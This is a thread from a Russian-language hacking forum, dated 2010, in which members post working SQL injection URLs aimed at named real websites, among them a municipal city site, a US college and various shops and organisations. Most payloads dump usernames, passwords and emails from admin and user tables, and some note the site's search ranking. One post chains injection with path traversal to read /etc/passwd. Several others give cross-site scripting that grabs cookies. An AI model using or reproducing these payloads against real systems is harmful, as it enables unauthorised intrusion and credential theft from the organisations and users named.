HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #12921  
Старый 31.08.2010, 04:35
AC//DC
Познающий
Регистрация: 28.07.2009
Сообщений: 98
Провел на форуме:
247684

Репутация: 136
По умолчанию

муниципальный сайт города АЛУШТА

муниципальный сайт города АЛУШТА

http://www.alushta.crimea.ua/rest/type_rest.php?type=-1+and+1=2+union+all+select+concat_ws(0x3a,login,pa ssword,email),2,3,4,5,6,7,8,9,10+from+users--
 
Ответить с цитированием

  #12922  
Старый 31.08.2010, 11:11
tracy
Познающий
Регистрация: 24.03.2009
Сообщений: 54
Провел на форуме:
333485

Репутация: 13
По умолчанию

http://www.romenewsbywatson.com/inside.php?id=-62+UnIon+selECt+1,2,3,4,5,concat_ws(0x3a,username, password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,2 1,22,23,24+from+adminusers+--+

PR: 3


http://www.bhcc.mass.edu/inside/inside.php?navID=132&id=257'+UnIon+selECt+1,versio n(),3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+

ТИЦ : 10

http://www.finger-lakes-tours.com/inside.php?id=-167'+UnIon+selECt+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17+--+

http://www.awrad.org/einside.php?id=-4+union+select+1,2,3,4,5+--+
 
Ответить с цитированием

  #12923  
Старый 31.08.2010, 12:26
Axel_Ustus
Новичок
Регистрация: 04.06.2010
Сообщений: 0
Провел на форуме:
2864

Репутация: 0
По умолчанию

http://www.artspace.org.au/gallery_project.php?i=132+union+select+1,2,3,4,5,v ersion%28%29,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24--

моя первая)

выложенная здесь
 
Ответить с цитированием

  #12924  
Старый 31.08.2010, 14:54
tracy
Познающий
Регистрация: 24.03.2009
Сообщений: 54
Провел на форуме:
333485

Репутация: 13
По умолчанию

http://www.vpole.ru/press/?id=-1741+union+select+1,2,concat_ws%280x3a,user,passwd %29,4,5,6,7+from+users+limit+0,1--+

ТИЦ : 375 PR: 5

http://tatalc.ru/tatalc2/?pg=3&bl=1&md=2&iddoc=-17499'+UnIon+selECt+1,2,3,4,5,concat_ws(0x3a,login ,passwd),7,8,9,10,11,12,13,14,15,16,17,18,19+from+ access_users+limit+0,1--+

ТИЦ : 350
 
Ответить с цитированием

  #12925  
Старый 31.08.2010, 17:24
LiRvD082
Новичок
Регистрация: 04.10.2009
Сообщений: 1
Провел на форуме:
14740

Репутация: 0
По умолчанию

Цитата:
Сообщение от None  
http://www.proday-biznes.ru/index.php?module=shop&file=checkout&id=-1+OR+(SELECT+COUNT(*)+FROM+(select+count(0),concat ((select+CONCAT(0x75737372,concat(0x7665723a,versi on()),0x75737372)+from+information_schema.tables+l imit+0,1),floor(rand(0)*2))+from+information_schem a.tables+group+by+2+limit+0,1)a)--+
....
 
Ответить с цитированием

  #12926  
Старый 31.08.2010, 18:29
daniel_1024
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
Провел на форуме:
698831

Репутация: 34
По умолчанию

1,5к хэшей за один запрос))

http://bomond.net.ua/my/compare.php?id=131269+and+1=0+union+select+1,conca t(@i:=0x00,@o:=0x0d0a,benchmark(1500,@o :=CONCAT(@o,0x0d0a,(SELECT concat(@i:=customers_password) from bomondlg_bomondshop.customers WHERE customers_password >@i order by customers_password LIMIT 1))),@o)

уберите где надо пробелы...

З.Ы. укоротил ссылку - http://is.gd/eNo1p

Заходить желательно через ФФ
 
Ответить с цитированием

  #12927  
Старый 31.08.2010, 19:18
tracy
Познающий
Регистрация: 24.03.2009
Сообщений: 54
Провел на форуме:
333485

Репутация: 13
По умолчанию

http://www.clean-up.ru/cat.php?id=-511+union+select+group_concat%28table_name%29,2,3, 4,5,6+from+information_schema.tables--+

ТИЦ : 20


Таблица admin : username,PASSWORD
 
Ответить с цитированием

  #12928  
Старый 31.08.2010, 20:13
Lilo
Moderator - Level 7
Регистрация: 10.03.2009
Сообщений: 1,013
Провел на форуме:
6183433

Репутация: 1521


По умолчанию

http://www.rzeczna.pl/lineage.php?id=-8+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48, 49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65 ,66,67,68,69,70,71,72,73,74,75+--+
 
Ответить с цитированием

  #12929  
Старый 31.08.2010, 20:39
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

SQL Injection

http://mec1rgqh.panontrade.com/offers.php?id=885+and+1=0+union+select+1,2,3,4,5,6 ,group_concat(es_admin_name,char(58),es_pwd),8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23+from+esb2 b_admin&file=Products&prod=sell&uid=mec1rgqh

читалка

входим в админку(http://panontrade.com/admin)

http://panontrade.com/admin/manage_pages.php?curr_page=passwd&curr_subdir=../../../../../../../../../../etc

XSS

и конечно же xss

http://panontrade.com

в поле поиска пишем ">alert()

и еще один xss в админке, http://panontrade.com/admin/edit_link.php

в поле Contact Person пишем ">alert(document.cookie)
 
Ответить с цитированием

  #12930  
Старый 01.09.2010, 00:27
Lilo
Moderator - Level 7
Регистрация: 10.03.2009
Сообщений: 1,013
Провел на форуме:
6183433

Репутация: 1521


По умолчанию

http://ugc.sollies.free.fr/joo154/m/un.php?id=-472+union+select+TABLE_NAME,2,3,4,5,6+FROM+INFORMA TION_SCHEMA.TABLES--

http://www.unostra.com/union.php?id=-12+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--

http://www.thailabordatabase.org/en/union.php?c=detail&id=-1312+union+select+1,2,3,4,5,database(),7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2 8,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44, 45,46,47,48,49,50,51,52,53,54,55--

http://www.unionradioirun.com/union.php?s=pro&s2=&pag=1&id=-197+union+select+database()--
 
Ответить с цитированием
Ответ





Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
 


Быстрый переход




ANTICHAT.XYZ